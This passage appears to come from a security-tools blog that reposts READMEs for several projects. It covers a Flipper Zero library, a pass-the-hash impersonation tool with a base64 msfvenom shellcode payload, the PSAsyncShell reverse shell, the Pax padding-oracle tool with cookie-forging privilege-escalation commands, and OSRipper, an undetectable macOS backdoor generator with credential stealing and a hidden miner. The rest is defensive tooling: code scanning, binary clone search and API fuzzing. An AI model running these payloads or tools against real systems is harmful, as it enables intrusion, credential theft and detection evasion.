#Transmit hex_address and hex_command selecting a protocol
flipper.ir.tx(protocol="Samsung32", hex_address="C000FFEE", hex_command="DEADBEEF")

#Raw Transmit samples
flipper.ir.tx_raw(frequency=38000, duty_cycle=0.33, samples=[1337, 8888, 3000, 5555])

#Synchronous default timeout 5 seconds
#Receive tx
r = flipper.ir.rx(timeout=10)

IKEY

#Read (default timeout 5 seconds)
ikey = flipper.ikey.read()

#Write (default timeout 5 seconds)
ikey = flipper.ikey.write(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

#Emulate (default timeout 5 seconds)
flipper.ikey.emulate(key_type="Dallas", key_data="DEADBEEFCOOOFFEE")

Log

#Attach event logger (default timeout 10 seconds)
logs = flipper.log.attach()

Debug

#Activate debug mode
flipper.debug.on()

#Deactivate debug mode
flipper.debug.off()

Onewire

#Search
response = flipper.onewire.search()

I2C

#Get
response = flipper.i2c.get()

Input

#Input dump
dump = flipper.input.dump()

#Send input
flipper.input.send("up", "press")

Optimizations

Feel free to contribute in any way

  • Queue Thread orchestrator (check dev branch)
  • Implement all the cli functions
  • Async SubGhz Chat (check dev branch)

License

MIT

Buy me a pint

ZEC: zs13zdde4mu5rj5yjm2kt6al5yxz2qjjjgxau9zaxs6np9ldxj65cepfyw55qvfp9v8cvd725f7tz7

ETH: 0xef3cF1Eb85382EdEEE10A2df2b348866a35C6A54

BTC: 15umRZXBzgUacwLVgpLPoa2gv7MyoTrKat

Contacts

  • Discord: white_rabbit#4124
  • Twitter: @nic_whr
  • GPG: 0x94EDEADC


SharpNamedPipePTH - Pass The Hash To A Named Pipe For Token Impersonation

26 September 2022 at 11:30
By: Zion3R


This project is a C# tool to use Pass-the-Hash for authentication on a local named pipe for user impersonation. You need local administrator or SeImpersonate rights to use it. There is a blog post with an explanation:

https://s3cur3th1ssh1t.github.io/Named-Pipe-PTH/

It is heavily based on the code from the project Sharp-SMBExec.

I faced certain offensive security project situations in the past where I already had the NTLM hash of a low-privileged user account and needed a shell for that user on the currently compromised system - but that was not possible with the public tools available. Imagine two more facts for a situation like that - the NTLM hash could not be cracked and there was no process of the victim user to execute shellcode in or to migrate into. This may sound like an absurd edge case to some of you, but I experienced it multiple times. In more than one engagement I spent a lot of time searching for the right tool/technique for that specific situation.

My personal goals for a tool/technique were:

  • A fully featured shell or C2 connection as the victim user account
  • It must also be able to impersonate low-privileged accounts - depending on engagement goals, it might be necessary to access a system as a specific user such as the CEO, HR accounts, SAP administrators or others
  • The tool can be used as a C2 module

The impersonated user unfortunately has no network authentication allowed, as the new process is using an Impersonation Token which is restricted. So you can only use this technique for local actions with another user.

There are two ways to use SharpNamedPipePTH. Either you can execute a binary (with or without arguments):

SharpNamedPipePTH.exe username:testing hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:C:\windows\system32\cmd.exe

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 binary:"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" arguments:"-nop -w 1 -sta -enc bgBvAHQAZQBwAGEAZAAuAGUAeABlAAoA"

Or you can execute shellcode as the other user:

SharpNamedPipePTH.exe username:testing domain:localhost hash:7C53CFA5EA7D0F9B3B968AA0FB51A3F5 shellcode:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY21kLmV4ZQA=

Which is msfvenom -p windows/x64/exec CMD=cmd.exe EXITFUNC=thread | base64 -w0.

I'm not happy with the shellcode execution yet, as it currently spawns notepad as the impersonated user and injects shellcode into that new process via a D/Invoke CreateRemoteThread syscall. I'm still looking for a possibility to spawn a process in the background or execute shellcode without needing a process of the target user for memory allocation.



PSAsyncShell - PowerShell Asynchronous TCP Reverse Shell

25 September 2022 at 11:30
By: Zion3R


PSAsyncShell is an Asynchronous TCP Reverse Shell written in pure PowerShell.

Unlike other reverse shells, all the communication and execution flow is done asynchronously, allowing it to bypass some firewalls and some countermeasures against this kind of remote connection.

Additionally, this tool features command history, screen wiping, file uploading and downloading, information splitting through chunks and reverse Base64 URL encoded traffic.
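
One plausible reading of the "reverse Base64 URL encoded traffic" mentioned above is URL-safe Base64 whose output is then reversed; the exact scheme is an assumption here, and PSAsyncShell implements its own version in PowerShell. A tiny Python illustration of that idea:

# Concept only: URL-safe Base64, then reverse the string; decoding undoes both.
import base64

def encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()[::-1]

def decode(blob: str) -> bytes:
    return base64.urlsafe_b64decode(blob[::-1])

assert decode(encode(b"whoami")) == b"whoami"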


Requirements

  • PowerShell 4.0 or greater

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/PSAsyncShell

Usage

.\PSAsyncShell.ps1 -h

____ ____ _ ____ _ _ _
| _ \/ ___| / \ ___ _ _ _ __ ___/ ___|| |__ ___| | |
| |_) \___ \ / _ \ / __| | | | '_ \ / __\___ \| '_ \ / _ \ | |
| __/ ___) / ___ \\__ \ |_| | | | | (__ ___) | | | | __/ | |
|_| |____/_/ \_\___/\__, |_| |_|\___|____/|_| |_|\___|_|_|
|___/

---------------------- by @JoelGMSec -----------------------

Info: This tool helps you to get a remote shell
over asynchronous TCP to bypass firewalls

Usage: .\PSAsyncShell.ps1 -s -p listen_port
Listen for a new connection from the client

.\PSAsyncShell.ps1 -c server_ip server_port
Connect the client to a PSAsyncShell server

Warning: All info betwen parts will be sent unencrypted
Download & Upload functions don't use MultiPart

The detailed guide of use can be found at the following link:

https://darkbyte.net/psasyncshell-bypasseando-firewalls-con-una-shell-tcp-asincrona

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gámez Molina // @JoelGMSec

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



Pax - CLI Tool For PKCS7 Padding Oracle Attacks

24 September 2022 at 11:30
By: Zion3R


Exploit padding oracles for fun and profit!

Pax (PAdding oracle eXploiter) is a tool for exploiting padding oracles in order to:

  1. Obtain plaintext for a given piece of CBC encrypted data.
  2. Obtain encrypted bytes for a given piece of plaintext, using the unknown encryption algorithm used by the oracle.

This can be used to disclose encrypted session information, and often to bypass authentication, elevate privileges and to execute code remotely by encrypting custom plaintext and writing it back to the server.
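
At its core, a CBC padding-oracle attack recovers plaintext one block at a time by forging the preceding ciphertext block and watching whether the server accepts the padding. Below is a minimal Python sketch of that step, assuming a hypothetical oracle(ciphertext) -> bool callback; it illustrates the general technique, not pax's internal code:

# Sketch: recover one CBC block using a padding oracle.
# `oracle` is a hypothetical callback returning True when padding is accepted.
def recover_block(prev_block: bytes, target_block: bytes, oracle, block_size=16) -> bytes:
    intermediate = bytearray(block_size)              # block-cipher decryption of target_block
    for pad in range(1, block_size + 1):              # pad value 0x01 .. block_size, right to left
        pos = block_size - pad
        forged = bytearray(block_size)
        for i in range(pos + 1, block_size):          # make known tail bytes decrypt to `pad`
            forged[i] = intermediate[i] ^ pad
        for guess in range(256):
            forged[pos] = guess
            if oracle(bytes(forged) + target_block):  # padding accepted -> guess found
                intermediate[pos] = guess ^ pad
                break
        else:
            raise ValueError("no valid padding found")
    # plaintext = intermediate XOR the real preceding ciphertext block (or IV)
    return bytes(i ^ p for i, p in zip(intermediate, prev_block))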

As always, this tool should only be used on systems you own and/or have permission to probe!


Installation

Download from releases, or install with Go:

go get -u github.com/liamg/pax/cmd/pax

Example Usage

If you find a suspected oracle, where the encrypted data is stored inside a cookie named SESS, you can use the following:

pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

This will hopefully give you some plaintext, perhaps something like:

 {"user_id": 456, "is_admin": false}

It looks like you could elevate your privileges here!

You can attempt to do so by first generating your own encrypted data that the oracle will decrypt back to some sneaky plaintext:

pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

This will spit out another base64 encoded set of encrypted data, perhaps something like:

dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Now you can open your browser and set the value of the SESS cookie to the above value. Loading the original oracle page, you should now see you are elevated to admin level.

How does this work?

The following are great guides on how this attack works:



SCodeScanner - Stands For Source Code Scanner Where The User Can Scans The Source Code For Finding The Critical Vulnerabilities

23 September 2022 at 11:30
By: Zion3R


SCodeScanner stands for Source Code Scanner, where the user can scan source code to find critical vulnerabilities. The main objective of this scanner is to find vulnerabilities in the source code before the code gets published to Prod.


Features

  1. Supported PHP Language
  2. Supported YAML Language
  3. Pass results to bug-tracking services like Jira and also Slack (sending files to a group of multiple people at once).
  4. Gives results in JSON format, which can easily be used by any other program.
  5. Works with rules. We only need to create rules when a target rule is not already present in the php/yaml directory.
  6. Rules can scan advanced patterns

Achievements

SCodeScanner received 5 CVEs for finding vulnerabilities in multiple CMS plugins.

  • CVE-2022-1465
  • CVE-2022-1474
  • CVE-2022-1527
  • CVE-2022-1532
  • CVE-2022-1604

How to run?

  • Download the repository -
  • Run pip3 install -r requirements.txt
  • And run python3 scscanner.py --help

Feedback/Improvements

I would love to hear your feedback on this tool. Open issues if you find any. And open a PR if you have something to contribute.

Contact

Utkarsh Agrawal
Website



OSRipper - AV Evading OSX Backdoor And Crypter Framework

22 September 2022 at 11:30
By: Zion3R


OSripper is a fully undetectable backdoor generator and crypter which specialises in macOS M1 malware. It will also work on Windows, but for now there is no support for it and it IS NOT FUD for Windows (yet, at least), and for now I will not focus on Windows.

You can also PM me on discord for support or to ask for new features SubGlitch1#2983


Features

  • FUD (for macOS)
  • Cloaks as an official app (Microsoft, ExpressVPN etc.)
  • Dumps sys info, browser history, logins, ssh/aws/azure/gcloud creds, clipboard content, local users etc. (more on Cedric Owens' swiftbelt)
  • Encrypted communications
  • Rootkit-like Behaviour
  • Every Backdoor generated is entirely unique

Description

Please check the wiki for information on how OSRipper functions (which changes extremely frequently)

https://github.com/SubGlitch1/OSRipper/wiki

Here are example backdoors which were generated with OSRipper




 macOS .apps will look like this on vt

Getting Started

Dependencies

You need Python. If you do not wish to download Python, you can download a compiled release. The Python dependencies are specified in the requirements.txt file.

Since version 1.4 you will need metasploit installed and on your PATH so that it can handle the meterpreter listeners.

Installing

Linux

apt install git python -y
git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

Windows

git clone https://github.com/SubGlitch1/OSRipper.git
cd OSRipper
pip3 install -r requirements.txt

or download the latest release from https://github.com/SubGlitch1/OSRipper/releases/tag/v0.2.3

Executing program

Only this

sudo python3 main.py

Contributing

Please feel free to fork and open pull requests. Suggestions/criticism are appreciated as well.

Roadmap

v0.1

  • ✅Get down detection to 0/26 on antiscan.me
  • ✅Add Changelog
  • ✅Daemonise Backdoor
  • ✅Add Crypter
  • ✅Add More Backdoor templates
  • ✅Get down detection to at least 0/68 on VT (for mac malware)

v0.2

  • ✅Add AntiVM
  • [] Implement tor hidden services
  • ✅Add Logger
  • ✅Add Password stealer
  • [] Add KeyLogger
  • ✅Add some new evasion options
  • ✅Add SilentMiner
  • [] Make proper C2 server

v0.3

Coming soon

Help

Just open an issue and I'll make sure to get back to you

Changelog

  • 0.2.1

    • OSRipper will now pull all information from the target and send it to the C2 server over sockets. This includes information like browser history, passwords, system information, keys, etc.
  • 0.1.6

    • The process will now trojanise itself as com.apple.system.monitor and drop to /Users/Shared
  • 0.1.5

    • Added Crypter
  • 0.1.4

    • Added 4th Module
  • 0.1.3

    • Got detection on VT down to 0. Made the process invisible
  • 0.1.2

    • Added 3rd module and listener
  • 0.1.1

    • Initial Release

License

MIT

Acknowledgments

Inspiration, code snippets, etc.

Support

I am very sorry to even write this here, but my finances are not looking good right now. If you appreciate my work I would really be happy about any donation. You do NOT have to; this is solely optional.

BTC: 1LTq6rarb13Qr9j37176p3R9eGnp5WZJ9T

Disclaimer

I am not responsible for what is done with this project. This tool is solely written to be studied by other security researchers to see how easy it is to develop macOS malware.



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy

21 September 2022 at 11:30
By: Zion3R

Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.

The advantage of grabbing syscalls dynamically is that the signature of the stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



Kam1n0 - Assembly Analysis Platform

20 September 2022 at 11:30
By: Zion3R


Kam1n0 v2.x is a scalable assembly management and analysis platform. It allows a user to first index a (large) collection of binaries into different repositories and provides different analytic services such as clone search and classification. It supports multi-tenancy access and management of assembly repositories by using the concept of Application. An application instance contains its own exclusive repository and provides a specialized analytic service. Considering the versatility of reverse engineering tasks, the Kam1n0 v2.x server currently provides three different types of clone-search applications: Asm-Clone, Sym1n0, and Asm2Vec, and an executable classification based on Asm2Vec. New application types can be further added to the platform.


A user can create multiple application instances. An application instance can be shared among a specific group of users. The application repository read-write access and on-off status can be controlled by the application owner. Kam1n0 v2.x server can serve the applications concurrently using several shared resource pools.

Kam1n0 was developed by Steven H. H. Ding and Miles Q. Li under the supervision of Benjamin C. M. Fung of the Data Mining and Security Lab at McGill University in Canada. It won the second prize at the Hex-Rays Plug-In Contest 2015. If you find Kam1n0 useful, please cite our paper:

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Kam1n0: MapReduce-based Assembly Clone Search for Reverse Engineering. In Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (SIGKDD), pages 461-470, San Francisco, CA: ACM Press, August 2016.

  • S. H. H. Ding, B. C. M. Fung, and P. Charland. Asm2Vec: boosting static representation robustness for binary clone search against code obfuscation and compiler optimization. In Proceedings of the 40th IEEE Symposium on Security and Privacy (S&P), 18 pages, San Francisco, CA: IEEE Computer Society, May 2019.

Asm-Clone

Asm-Clone applications try to solve the efficient subgraph search problem (i.e. graph isomorphism problem) for assembly functions (<1.3s average query time and <30ms average index time with 2.3M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below).

  • Application Type: Asm-Clone
  • The original clone search service used in Kam1n0 v1.x.
  • Currently support Meta-PC, ARM, PowerPC, and TMS320c6 (experimental).
  • Support subgraph clone search within a certain assembly code family.
    • + Good interpretability of the result: breaks down to subgraphs.
    • + Accurate for searching within the given code family.
    • + Good for differing various patches or versions for big binaries.
    • - Relatively more sensitive to instruction set changes, optimizations, and obfuscation.
    • - Need to pre-define the syntax of the assembly code language.
    • - Need to have assembly code of the same chosen family in the repository.

 

Sym1n0

Semantic clone search by differentiated fuzz testing and constraint solving. An efficient and scalable dynamic-static hybrid approach (<1s average query time and <100ms average index time with 1.5M functions). Given a target function (the one on the left as shown below), it can identify the cloned subgraphs among other functions in the repository (the one on the right as shown below). Support visualization of abstract syntax graph.

  • Application Type: Sym1n0 (v2 only)
  • Clone search by both symbolic execution and concrete execution.
  • Differentiate functions based on their different I/O behavior.
  • Clone search conducted on the abstract syntax graph constructed from Vex IR (powered by LibVex).
    • + Clone search across different assembly code families.
      • For example, indexed x86 binaries but the query is ARM code.
    • + Subgraph clone search.
    • + Support a wide range of families through LibVex.
      • x86, AMD64, MIPS32, MIPS64, PowerPC32, PowerPC64, ARM32, and ARM64.
    • + An efficient dynamic-static hybrid approach.
    • + Ideal for analyzing firmware compiled for different processors.
    • - Sensitive to heavy graph manipulation (such as a full flattening).
    • - Sensitive to large scale breakdown of basic block integrity.

 

Asm2Vec

Asm2Vec leverages representation learning. It understands the lexical semantic relationship of assembly code. For example, xmm* registers are semantically related to vector operations such as addps. memcpy is similar to strcpy. The graph below shows different assembly functions compiled from the same source code of gmpz_tdiv_r_2exp in libgmp. From left to right, the assembly functions are compiled with GCC O0 option, GCC O3 option, O-LLVM obfuscator Control Flow Graph, Flattening option, and LLVM obfuscator Bogus Control Flow Graph option. Asm2Vec can statically identify them as clones.

  • Leverage representation learning.
  • Understand the lexical semantic relationship of assembly code.
    • + State-of-the-art for clone search against heavy code obfuscation techniques.
      • (>0.8 accuracy for all options applied in O-LLVM, multiple iterations).
    • + State-of-the-art for clone search against code optimization.
      • (>0.8 accuracy between O0 and O3, >0.94 accuracy between O2 and O3)
    • + Even better result than the most recent dynamic approach.
    • + Much more efficient than recent dynamic approaches.
    • + Do not need to define the architecture. It self-learns by reading large volume of code.
    • + Static approach: efficient and scalable.
    • - No subgraphs.
    • - Assume the assembly code comes from the same processor family.
    • - Static approach: cannot recognize jump table, etc.

 

Executable Classification

In this application, the user defines a set of software classes based on functional relatedness and provides binaries belonging to each class. The system then automatically groups functions into clusters in which functions are connected directly or indirectly by clone relations. The clusters that are discriminative for the classification are kept and serve as signatures of their classes. Given a target binary, the system shows the degree to which it belongs to each software class.


  • Use Asm2Vec as its function similarity computation model

    • + Provide interpretable classification results.
    • + Learn common characteristics (i.e., function clusters) of each class.
    • + Able to handle smaller and imbalanced datasets than an ordinary machine learning model.
    • - The limitation is that the assumption that binaries in the same class share some common functions must hold for the system to work.

     

Platform Overview

The figure below shows the major UI components and functionalities of Kam1n0 v2.x. We adopt a material design. In general, each user has an application list, a running-job list, and a result file list.

  • Application list shows the application instances owned by the user and shared by the others.
  • Running-job list shows the running progress for a large query (such as chrome.dll) and indexing procedure.
  • Result file list displays the saved results. More details of the UI design can be found in our detailed tutorial.


Installation Instruction

The current release of Kam1n0 consists of two installers: the core server and IDA Pro plug-in.

Installer | Included components | Description
Kam1n0-Server.msi | Core engine | Main engine providing service for indexing and searching.
 | Workbench | A user interface to manage the repositories and running service.
 | Web user interface | Web user interface for searching/indexing binary files and assembly functions.
 | Visual C++ redistributable for VS 15 | Dependency for z3.
Kam1n0-IDA-Plugin.msi | Plug-in | Connectors and user interface.
 | PyPI wheels for Cefpython | Rendering engine for the user interface.
 | PyPI and dependent wheels | Package management for Python. Included for IDA 6.8 & 6.9.

Installing the Kam1n0 Server

The Kam1n0 core engine is purely written in Java. You need the following dependencies:

  • [Required] The latest x64 11.x JRE/JDK distribution from Oracle.
  • [Optional] The latest version of IDA Pro with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Download the Kam1n0-Server.msi file from our release page. Follow the instructions to install the server. You will be prompted to select an installation path. IDA Pro is optional if the server does not have to deal with any disassembling. In other words, the client side uses the Kam1n0 plugin for IDA Pro. It is strongly suggested to have the IDA Pro installed with the Kam1n0 server. Kam1n0 server will automatically detect your IDA Pro by looking for the default application that you used to open .i64 file.

Installing the IDA Pro Plug-in

The Kam1n0 IDA Pro plug-in is written in Python for the logic and in HTML/JavaScript for the rendering. The following dependencies are required for its installation:

  • [Required] IDA Pro (>6.7) with the idapython plug-in installed. The Python plug-in and runtime should have already been installed with IDA Pro. Reinstall IDA Pro if necessary.

Next, download the Kam1n0-IDA-Plugin.msi installer from our release page. Follow the instructions to install the plug-in and runtime. Please note that the plug-in has to be installed in the IDA Pro plugins folder which is located at $IDA_PRO_PATH$/plugins. For example, on Windows, the path could be C:/Program Files (x86)/IDA 6.95/plugins. The installer will detect and validate the path.

Setting Up Kam1n0 on Ubuntu/Debian-based systems

  • Ensure you have the Oracle version of Java 11. (Not default-jdk in apt.)

    • Add Oracle's PPA and then update your package repository: sudo add-apt-repository ppa:webupd8team/java
      • If you encounter any errors (such as ~webupd8team not found) and you are on a proxy, make sure you set and export your http_proxy and https_proxy environment variables, and then try again with the -E option on sudo. Additionally, if you are getting an 'add-apt-repository command not found' error, try: sudo apt install -y software-properties-common.
    • Afterwards: sudo apt-get update, and sudo apt-get install oracle-java8-installer
      • Verify your Java version with java -version; you may need to manually set the JAVA_HOME environment variable (in /etc/environment), JAVA_HOME=/usr/lib/jvm/java-11-oracle
  • Download the latest release for Linux (Kam1n0-IDA-Plugin.tar.gz and Kam1n0-Server.tar.gz) from Kam1n0-Community.

  • Extract the two tarballs (i.e. tar -xvzf Kam1n0-IDA-Plugin.tar.gz and tar -xvzf Kam1n0-Server.tar.gz)

  • The Kam1n0-Server.tar.gz file will create the server directory.

  • Inside the server directory, you should see a file called kam1n0.properties, which is where you will set various configurations for kam1n0; this is very important.

  • Set kam1n0.data.path to where you would like your kam1n0-related data to be written; we chose to put it in the same place as the server. kam1n0.ida.home refers to where your IDA installation is located. Comment out this line (and kam1n0.ida.batch, the line following it) if you do not have IDA and don't plan to use kam1n0 for disassembly. For more (accurate) information about the kam1n0.properties file, see the kam1n0.properties.explained file; a minimal sketch is also shown after this list.

  • Run kam1n0-server-workbench: java -jar kam1n0-server-workbench.jar. This should cause a window to pop up, which prompts you to actually start kam1n0. Alternatively, run kam1n0-server: java -jar kam1n0-server.jar --start. This starts the server from the console without a window.

  • To connect and use it, go to 127.0.0.1:8571 (the default port kam1n0 listens on should be 8571, but can be changed in kam1n0.properties) in your browser. You should see the pretty kam1n0 web UI. From there, follow the tutorial on the Kam1n0-Community repo if you do not know how to use kam1n0.
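
A minimal kam1n0.properties sketch is shown below. It only covers the two settings discussed above; the paths are placeholders and the authoritative list of options is in kam1n0.properties.explained.

# placeholder values; adjust to your environment
kam1n0.data.path=/home/user/kam1n0-data
# comment out kam1n0.ida.home (and the kam1n0.ida.batch line that follows it in the shipped file) if IDA Pro is not installed
kam1n0.ida.home=/opt/ida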

Backward Compatibility

The assembly code repositories and configuration files used in previous versions (<2.0.0) are no longer supported by the latest version. Please contact us if you need to migrate your old repositories.

Documentation

Development

Clone the latest stable branch (don't forget --recursive!):

git clone --recursive -b master2.x --single-branch https://github.com/McGill-DMaS/Kam1n0-Community

Importing the project.

IntelliJ: Import the root /kam1n0/kam1n0/ as a Maven project. All the submodules will be loaded accordingly. Eclipse EE: Add the cloned git repository to the git view and import all Maven projects from the git repository. You may need to modify the classpath to address any errors. All the resource paths are dynamically adjusted when running inside an IDE (through the kam1n0-resources submodule).

To build the project:

cd /kam1n0/kam1n0
mvn -DskipTests clean package
mvn -DskipTests package

The resulting binaries can be found in /kam1n0/build-bins/

To run the test code, you will need to first download chromedriver.exe from http://chromedriver.chromium.org/ and add its absolute path to an environment variable named webdriver.chrome.driver. A Chrome browser must also be installed on the system. The test code will launch a browser instance to test the UI interfaces. The complete testing procedure will take approximately 3 hours.

cd /kam1n0/kam1n0
mvn -DskipTests clean package # you can skip this one if you already built the package
mvn -DskipTests package # you can skip this one if you already built the package
mvn -DforkMode=never test

These commands only compile the Java code, using pre-compiled wheels of libvex and z3, so they work out-of-the-box. Building libvex and z3 themselves is platform-dependent; we use a fork of libvex from Angr. More complete build scripts, as well as installers for Windows/Linux, can be found under /kam1n0-builds/

  • kam1n0: The server's source code.
  • kam1n0-builds: Installer source code and scripts to build the distribution.
  • kam1n0-clients: The clients' source code.

Binary Releases

We have a Jenkins server for continuous development and delivery. The latest stable release will be posted here. Periodically we will synchronize our internal experimental branch with this repository.

Licensing

The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.

Copyright 2014-2021 McGill University and the Researchers. All rights reserved.



CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints

19 September 2022 at 11:30
By: Zion3R


REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!

  • Comprehensive: tests are generated automatically based on a large number of scenarios and cover every field and header
  • Intelligent: tests are generated based on data types and constraints; each Fuzzer has specific expectations depending on the scenario under test
  • Highly Configurable: extensive customization: you can exclude specific Fuzzers or HTTP response codes, provide business context and a lot more
  • Self-Healing: as tests are generated, any OpenAPI spec change is picked up automatically
  • Simple to Learn: flat learning curve, with intuitive configuration and syntax
  • Fast: tests are written, run and reported automatically, covering thousands of scenarios within minutes

Overview

By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data, from fully random large Unicode values to well-crafted, context-dependent values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.


Please check the Slicing Strategies section for tips on making CATS runs both fast and comprehensive at the same time.

Tutorials on how to use CATS

This is a list of articles with step-by-step guides on how to use CATS:

Some bugs found by CATS

Installation

Homebrew

> brew tap endava/tap
> brew install cats

Manual

CATS is bundled both as an executable JAR or a native binary. The native binaries do not need Java installed.

After downloading your OS native binary, you can add it to your PATH so that you can execute it like any other command-line tool:

sudo cp cats /usr/local/bin/cats

You can also get autocomplete by downloading the cats_autocomplete script and do:

source cats_autocomplete

To get persistent autocomplete, add the above line to ~/.zshrc or ~/.bashrc, but make sure you use the fully qualified path for the cats_autocomplete script.

You can also check the cats_autocomplete source for alternative setup.

There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.

You can run it as java -jar cats.jar.

Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.

Build

You can build CATS from sources on your local machine. You need Java 11+. Maven is already bundled.

Before running the first build, please make sure you do a ./mvnw clean. CATS uses a fork of OkHttpClient which will install locally under the 4.9.1-CATS version, so don't worry about overriding the official versions.

You can use the following Maven command to build the project:

./mvnw package -Dquarkus.package.type=uber-jar

cp target/

You will end up with a cats.jar in the target folder. You can run it with java -jar cats.jar ....

You can also build native images using a GraalVM Java version.

./mvnw package -Pnative

Note: You will need to configure Maven with a Github PAT with read-packages scope to get some dependencies for the build.
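
A minimal ~/.m2/settings.xml sketch for this is shown below; the server id is a placeholder assumption and must match the repository id referenced by the build, and the credentials are your GitHub username and the PAT.

<settings>
  <servers>
    <server>
      <!-- placeholder id; must match the repository id used by the build -->
      <id>github</id>
      <username>YOUR_GITHUB_USERNAME</username>
      <!-- a GitHub PAT with the read:packages scope -->
      <password>YOUR_GITHUB_PAT</password>
    </server>
  </servers>
</settings>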

Notes on Unit Tests

You may see some ERROR log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers.

Running CATS

Blackbox mode

Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox

In blackbox mode CATS will only report ERRORs if the received HTTP response code is a 5XX. Any other mismatch between what the Fuzzer expects and what the service returns (for example the Fuzzer expects a 400 and the service returns a 200) will be ignored.

The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.

Context mode

The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.

Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so it's important that any entities/resources required by request fields or query parameters are created in advance and added to the reference data file.

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Notes on skipped Tests

You may notice a significant number of tests marked as skipped. CATS will try to apply all Fuzzers to all fields, but this is not always possible. For example the BooleanFieldsFuzzer cannot be applied to String fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped tests in order to show that CATS actually tries all the Fuzzers on all the fields/paths/endpoints.

Additionally, CATS supports a lot more arguments that allow you to restrict the number of Fuzzers, provide timeouts, limit the number of requests per minute and so on.

Understanding how CATS works and reports results

CATS generates tests based on configured Fuzzers. Each Fuzzer has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer expected result. Depending on the matching outcome, CATS will report as follows:

  • INFO/SUCCESS is expected and documented behaviour. No need for action.
  • WARN is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.
  • ERROR is abnormal/unexpected behaviour. This must be actioned.

CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf/anyOf elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:

  • for methods with request bodies like POST, PUT the fuzzing will be applied at the request body data models level
  • for methods without request bodies like GET, DELETE the fuzzing will be applied at the URL parameters level

This means that for methods with request bodies (POST, PUT) that also have URL/path parameters, you need to supply the path parameters via urlParams or the referenceData file; failure to do so will result in Illegal character in path at index ... errors.
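
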